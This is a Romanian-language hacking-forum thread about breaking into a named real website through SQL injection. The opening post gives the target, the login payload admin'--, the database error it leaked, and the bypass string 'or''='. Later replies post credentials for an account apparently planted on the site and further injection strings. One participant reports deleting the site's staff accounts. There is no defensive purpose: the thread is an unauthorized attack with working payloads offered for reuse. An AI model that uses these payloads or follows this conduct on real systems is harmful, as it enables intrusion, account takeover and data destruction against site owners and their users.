Jump to content
escalation666

sql injection in [url]http://www.fotoshop.ro[/url]

Recommended Posts

Posted

http://www.fotoshop.ro that's the target

Why? pt ca face spam

Vulnerabilitate:sql injection

Poc: user:admin'--

Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)

Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin.

De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.

Posted

user: kadaj

pass: sugipula

scuzatzi parola :)

asta in caz ca nu va mai merge sql injectul

Posted

Io stiam ca iei sursa codului scoti java din el astfel incat sa vezi la pass ce scrii si pui ceva de genu

" * or 1+1 -- " si la user ce vrei...tu...nush daca e corect...daca nu sa ma corectati :P

Oricum multam :P

Posted

gg flama!

christmas...se poate si asa...probabil ai vazut chestia asta dintr-un tutorial video :)

e util sa faci asta cand la username trebuie sa pui o adresa de email...si javascriptul nu te lasa sa pui ceva de genu [mail]dfdf@fdwfdw.com[/mail] ;)

Posted
devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? :)

gen.. change username? :P

Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@

Posted
greeny wrote:
devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? :)

gen.. change username? :P

Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@

offf numai pe distrugeri suntetzi pushi mai copii :))

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...